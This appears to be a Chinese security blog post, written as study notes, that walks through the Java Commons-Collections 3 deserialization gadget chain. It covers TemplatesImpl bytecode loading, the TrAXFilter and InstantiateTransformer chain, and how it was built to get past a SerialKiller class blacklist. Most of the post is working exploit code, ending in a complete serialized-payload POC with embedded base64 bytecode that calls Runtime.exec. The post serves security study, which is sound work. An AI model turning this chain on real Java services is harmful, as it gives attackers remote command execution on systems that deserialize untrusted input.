Java CommonCollections3利用链

发布于 2021-11-30  731 次阅读


0x00 动态加载字节码

0x00 ClassLoader#defineClass直接加载字节码

java编译器会将.java文件编译成jvm可以识别的机器代码保存在.class文件当中。正常情况下,java会先调用classLoader去加载.class文件,然后调用loadClass函数去加载对应的类名,返回一个Class对象。

ClassLoader#defineClass提供了另外一种方法,defineClass可以将我们编译好的.class或者.jar文件转换成byte[]放到内存中,然后直接用defineClass加载byte[]返回Class对象。

由于ClassLoader#defineClassprotected属性,无法直接在外部访问,所以得使用反射来进行访问。

protected final Class<?> defineClass(String name, byte[] b, int off, int len)
  throws ClassFormatError
{
  return defineClass(name, b, off, len, null);
}

一个简单的demo代码演示如何使用ClassLoader#defineClass直接加载字节码。

import java.lang.reflect.Method;
import java.util.Base64;

public class HelloClassLoader {
  public static void main(String[] args) throws Exception {
    Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
    defineClass.setAccessible(true);
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQAGwoABgANCQAOAA8IABAKABEAEgcAEwcAFAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwABwAIBwAVDAAWABcBAAtIZWxsbyBXb3JsZAcAGAwAGQAaAQAFSGVsbG8BABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAABAAEABwAIAAEACQAAAC0AAgABAAAADSq3AAGyAAISA7YABLEAAAABAAoAAAAOAAMAAAACAAQABAAMAAUAAQALAAAAAgAM");
    Class hello =
      (Class) defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code,
        0, code.length);
    hello.newInstance();
  }
}

运行上述代码会输出Hello World

0x01 利用TemplatesImpl加载字节码

TemplatesImpl中有一个内部类TransletClassLoader,它重写了方法defineClass,且作用域为默认default,在类外部也可以访问。

static final class TransletClassLoader extends ClassLoader {
  private final Map<String,Class> _loadedExternalExtensionFunctions;

  TransletClassLoader(ClassLoader parent) {
    super(parent);
    _loadedExternalExtensionFunctions = null;
  }

  TransletClassLoader(ClassLoader parent,Map<String, Class> mapEF) {
    super(parent);
    _loadedExternalExtensionFunctions = mapEF;
  }

  public Class<?> loadClass(String name) throws ClassNotFoundException {
    Class<?> ret = null;
    // The _loadedExternalExtensionFunctions will be empty when the
    // SecurityManager is not set and the FSP is turned off
    if (_loadedExternalExtensionFunctions != null) {
      ret = _loadedExternalExtensionFunctions.get(name);
    }
    if (ret == null) {
      ret = super.loadClass(name);
    }
    return ret;
  }

  /**
     * Access to final protected superclass member from outer class.
     */
  Class defineClass(final byte[] b) {
    return defineClass(null, b, 0, b.length);
  }
}

TemplatesImpl中全局搜索一下,找到了方法defineTransletClasses调用了上面重新的defineClass方法。继续往前追溯,找到这样一条调用链,其中TemplatesImpl#newTransformer()的作用域为public,可在类外部访问。

TemplatesImpl#newTransformer() ->

TemplatesImpl#getTransletInstance() ->

TemplatesImpl#defineTransletClasses() ->

TransletClassLoader#defineClass()

defineTransletClasses()中调用defineClass()的代码如下,其中_bytecodes[0]为我们要执行的字节码。

for (int i = 0; i < classCount; i++) {
  _class[i] = loader.defineClass(_bytecodes[i]);
  final Class superClass = _class[i].getSuperclass();

  // Check if this is the main class
  if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
    _transletIndex = i;
  }
  else {
    _auxClasses.put(_class[i].getName(), _class[i]);
  }
}

同样在defineTransletClasses()中,存在一个调用_tfactory.getExternalExtensionsMap()getExternalExtensionsMap()TransformerFactoryImpl类的一个方法,因此_tfactory得为TransformerFactoryImpl对象,这样在进行调用时才能不报错。

TransletClassLoader loader = (TransletClassLoader)
  AccessController.doPrivileged(new PrivilegedAction() {
    public Object run() {
      return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
    }
  });

往上,在getTransletInstance()中,存在这样一个判断,如果_name为null则返回null,因此得给_name进行赋值,为任意字符串即可。

if (_name == null) return null;

这样在POC我们就有了这样的赋值,setFieldValue利用反射给私有变量赋值。

setFieldValue(obj, "_bytecodes", new byte[][] {code});
setFieldValue(obj, "_name", "So4ms");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

defineTransletClasses()执行完loader.defineClass(_bytecodes[i])后存在如下这样一个判断,判断superClass的类是否等于ABSTRACT_TRANSLET

// Check if this is the main class
if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
  _transletIndex = i;
}
else {
  _auxClasses.put(_class[i].getName(), _class[i]);
}

ABSTRACT_TRANSLET的值为"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"。即我们传入的字节码需要为com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet的子类。

private static String ABSTRACT_TRANSLET  = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";

构造特定的字节码:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class So4ms extends AbstractTranslet {

  @Override
  public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

  }

  @Override
  public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

  }

  public So4ms() throws Exception {
    Runtime.getRuntime().exec("calc");
  }
}

于是POC如下:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import java.util.Base64;
import static ysoserial.payloads.util.Reflections.setFieldValue;


public class HelloClassLoader {
  public static void main(String[] args) throws Exception {
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAHTFNvNG1zOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAlAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYHACYBAApTb3VyY2VGaWxlAQAKU280bXMuamF2YQwAGQAaBwAnDAAoACkBAARjYWxjDAAqACsBAAVTbzRtcwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAwABAAcACAACAAkAAAA/AAAAAwAAAAGxAAAAAgAKAAAABgABAAAADAALAAAAIAADAAAAAQAMAA0AAAAAAAEADgAPAAEAAAABABAAEQACABIAAAAEAAEAEwABAAcAFAACAAkAAABJAAAABAAAAAGxAAAAAgAKAAAABgABAAAAEQALAAAAKgAEAAAAAQAMAA0AAAAAAAEADgAPAAEAAAABABUAFgACAAAAAQAXABgAAwASAAAABAABABMAAQAZABoAAgAJAAAAQAACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAACAAoAAAAOAAMAAAATAAQAFAANABUACwAAAAwAAQAAAA4ADAANAAAAEgAAAAQAAQAbAAEAHAAAAAIAHQ==");
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates, "_bytecodes", new byte[][]{code});
    setFieldValue(templates, "_name", "So4ms");
    setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
    templates.newTransformer();
  }
}

0x01 小demo

CommonsCollections1的学习当中曾使用了TransformedMap来进行漏洞的利用,通过构造POC链,最后利用InvokerTransformer来进行命令的执行。

TransformedMap是起到了触发利用链的作用,那么我们能否将Transformer[]中的利用链使用上面所提到的TemplatesImpl来进行替换呢。

简单修改一下Transformer[],调用TemplatesImpl#newTransformer()就可以运行字节码了。

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

import static ysoserial.payloads.util.Reflections.setFieldValue;

public class CommonCollections3 {
  public static void main(String[] args) throws Exception {
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAHTFNvNG1zOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAlAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYHACYBAApTb3VyY2VGaWxlAQAKU280bXMuamF2YQwAGQAaBwAnDAAoACkBAARjYWxjDAAqACsBAAVTbzRtcwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAwABAAcACAACAAkAAAA/AAAAAwAAAAGxAAAAAgAKAAAABgABAAAADAALAAAAIAADAAAAAQAMAA0AAAAAAAEADgAPAAEAAAABABAAEQACABIAAAAEAAEAEwABAAcAFAACAAkAAABJAAAABAAAAAGxAAAAAgAKAAAABgABAAAAEQALAAAAKgAEAAAAAQAMAA0AAAAAAAEADgAPAAEAAAABABUAFgACAAAAAQAXABgAAwASAAAABAABABMAAQAZABoAAgAJAAAAQAACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAACAAoAAAAOAAMAAAATAAQAFAANABUACwAAAAwAAQAAAA4ADAANAAAAEgAAAAQAAQAbAAEAHAAAAAIAHQ==");
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates, "_bytecodes", new byte[][]{code});
    setFieldValue(templates, "_name", "So4ms");
    setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

    Transformer[] transformers = new Transformer[]{
      new ConstantTransformer(templates),
      new InvokerTransformer("newTransformer", null, null),
    };

    Transformer transformerChain = new
      ChainedTransformer(transformers);

    Map innerMap = new HashMap();
    Map outerMap = TransformedMap.decorate(innerMap, null,
      transformerChain);
    outerMap.put("test", "xxxx");
  }
}

运行上述代码,成功命令执行。

0x02 CommonsCollections3

CommonsCollections3的利用链中,没有使用之前的InvokerTransformer来进行命令执行,而是选用了 com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter

据P神所说,这是因为SerialKiller这样一个Java反序列化过滤器,可以通过黑名单与白名单的方式来限制反序列化时允许通过的类。在最初的黑名单中,将InvokerTransformer过滤掉了,所以为此增加了CommonsCollections3的利用链,使用TrAXFilter来绕过黑名单。

<blacklist>
  <!-- ysoserial's CommonsCollections1 payload -->
  <regexp>^org\.apache\.commons\.collections\.functors\.InvokerTransformer$</regexp> 
  <!-- ysoserial's CommonsCollections2 payload -->
  <regexp>^org\.apache\.commons\.collections4\.functors\.InvokerTransformer$</regexp>
  <!-- ysoserial's Groovy payload -->  
  <regexp>^org\.codehaus\.groovy\.runtime\.ConvertedClosure$</regexp> 
  <regexp>^org\.codehaus\.groovy\.runtime\.MethodClosure$</regexp>  
  <!-- ysoserial's Spring1 payload -->
  <regexp>^org\.springframework\.beans\.factory\.ObjectFactory$</regexp> 
</blacklist>

我们在上面利用了TemplatesImpl来进行命令执行,因此我们得想办法调用TemplatesImpl#newTransformer(),正好在TrAXFilter的构造方法中调用了templates.newTransformer()

public TrAXFilter(Templates templates) throws
  TransformerConfigurationException
{
  _templates = templates;
  _transformer = (TransformerImpl) templates.newTransformer();
  _transformerHandler = new TransformerHandlerImpl(_transformer);
  _useServicesMechanism = _transformer.useServicesMechnism();
}

但是呢InvokerTransformer被过滤掉不能使用了,就不能调用TrAXFilter的构造方法了。

这时有另一个实现了Transformer接口的类org.apache.commons.collections.functors.InstantiateTransformer,它的构造方法以及transform()方法如下。这里利用getConstructor获取构造方法,通过返回的构造器来实例化,正好可以用来调用上面提到的TrAXFilter的构造方法。

public InstantiateTransformer(Class[] paramTypes, Object[] args) {
  super();
  iParamTypes = paramTypes;
  iArgs = args;
}

public Object transform(Object input) {
  try {
    ......
    Constructor con = ((Class) input).getConstructor(iParamTypes);
    return con.newInstance(iArgs);

  }
  ......
}

这样一来Transformer[]就有了,这里TrAXFilter的构造方法的参数类型为Templates,所以InstantiateTransformer()的第一个参数为Templates.class,第二个参数为实现了Templates接口的类的字节码,最后执行该字节码。

Transformer[] transformers = new Transformer[]{
  new ConstantTransformer(TrAXFilter.class),
  new InstantiateTransformer(
    new Class[]{Templates.class},
    new Object[]{templates}),
};

那么一个CommonsCollections3的demo代码就有了。

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.TransformedMap;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;

import javax.xml.transform.Templates;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

import static ysoserial.payloads.util.Reflections.setFieldValue;

public class CommonCollections3 {
  public static void main(String[] args) throws Exception {
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAHTFNvNG1zOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAlAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYHACYBAApTb3VyY2VGaWxlAQAKU280bXMuamF2YQwAGQAaBwAnDAAoACkBAARjYWxjDAAqACsBAAVTbzRtcwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAwABAAcACAACAAkAAAA/AAAAAwAAAAGxAAAAAgAKAAAABgABAAAADAALAAAAIAADAAAAAQAMAA0AAAAAAAEADgAPAAEAAAABABAAEQACABIAAAAEAAEAEwABAAcAFAACAAkAAABJAAAABAAAAAGxAAAAAgAKAAAABgABAAAAEQALAAAAKgAEAAAAAQAMAA0AAAAAAAEADgAPAAEAAAABABUAFgACAAAAAQAXABgAAwASAAAABAABABMAAQAZABoAAgAJAAAAQAACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAACAAoAAAAOAAMAAAATAAQAFAANABUACwAAAAwAAQAAAA4ADAANAAAAEgAAAAQAAQAbAAEAHAAAAAIAHQ==");
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates, "_bytecodes", new byte[][]{code});
    setFieldValue(templates, "_name", "So4ms");
    setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

    Transformer[] transformers = new Transformer[]{
      new ConstantTransformer(TrAXFilter.class),
      new InstantiateTransformer(
        new Class[]{Templates.class},
        new Object[]{templates}),
    };

    Transformer transformerChain = new
      ChainedTransformer(transformers);

    Map innerMap = new HashMap();
    Map outerMap = TransformedMap.decorate(innerMap, null,
      transformerChain);
    outerMap.put("test", "xxxx");
  }
}

将上述这个demo代码改成POC,可以参考之前CommonsCollections1的编写过程,找到一个类的readObject()方法中可以进行map的写入从而触发漏洞,比如jdk8u71之前的sun.reflect.annotation.AnnotationInvocationHandler,或者高版本也可以利用的org.apache.commons.collections.keyvalue.TiedMapEntry,这里就给出利用AnnotationInvocationHandler来编写的POC。

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.functors.InstantiateTransformer;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;

import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

import static ysoserial.payloads.util.Reflections.setFieldValue;

public class CommonCollections3 {
  public static void main(String[] args) throws Exception {
    byte[] code = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAHTFNvNG1zOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAlAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYHACYBAApTb3VyY2VGaWxlAQAKU280bXMuamF2YQwAGQAaBwAnDAAoACkBAARjYWxjDAAqACsBAAVTbzRtcwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABgAAAAAAAwABAAcACAACAAkAAAA/AAAAAwAAAAGxAAAAAgAKAAAABgABAAAADAALAAAAIAADAAAAAQAMAA0AAAAAAAEADgAPAAEAAAABABAAEQACABIAAAAEAAEAEwABAAcAFAACAAkAAABJAAAABAAAAAGxAAAAAgAKAAAABgABAAAAEQALAAAAKgAEAAAAAQAMAA0AAAAAAAEADgAPAAEAAAABABUAFgACAAAAAQAXABgAAwASAAAABAABABMAAQAZABoAAgAJAAAAQAACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAACAAoAAAAOAAMAAAATAAQAFAANABUACwAAAAwAAQAAAA4ADAANAAAAEgAAAAQAAQAbAAEAHAAAAAIAHQ==");
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates, "_bytecodes", new byte[][]{code});
    setFieldValue(templates, "_name", "So4ms");
    setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

    Transformer[] transformers = new Transformer[]{
      new ConstantTransformer(TrAXFilter.class),
      new InstantiateTransformer(
        new Class[]{Templates.class},
        new Object[]{templates}),
    };

    Transformer transformerChain = new ChainedTransformer(transformers);
    Map innerMap = new HashMap();
    Map outerMap = LazyMap.decorate(innerMap, transformerChain);

    Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);
    construct.setAccessible(true);
    InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap);
    Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, handler);
    handler = (InvocationHandler) construct.newInstance(Retention.class, proxyMap);
    ByteArrayOutputStream barr = new ByteArrayOutputStream();
    ObjectOutputStream oos = new ObjectOutputStream(barr);
    oos.writeObject(handler);
    oos.close();
    System.out.println(barr);
    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
    Object o = ois.readObject();
  }
}

参考资料

p神知识星球
[Java安全]动态加载字节码学习笔记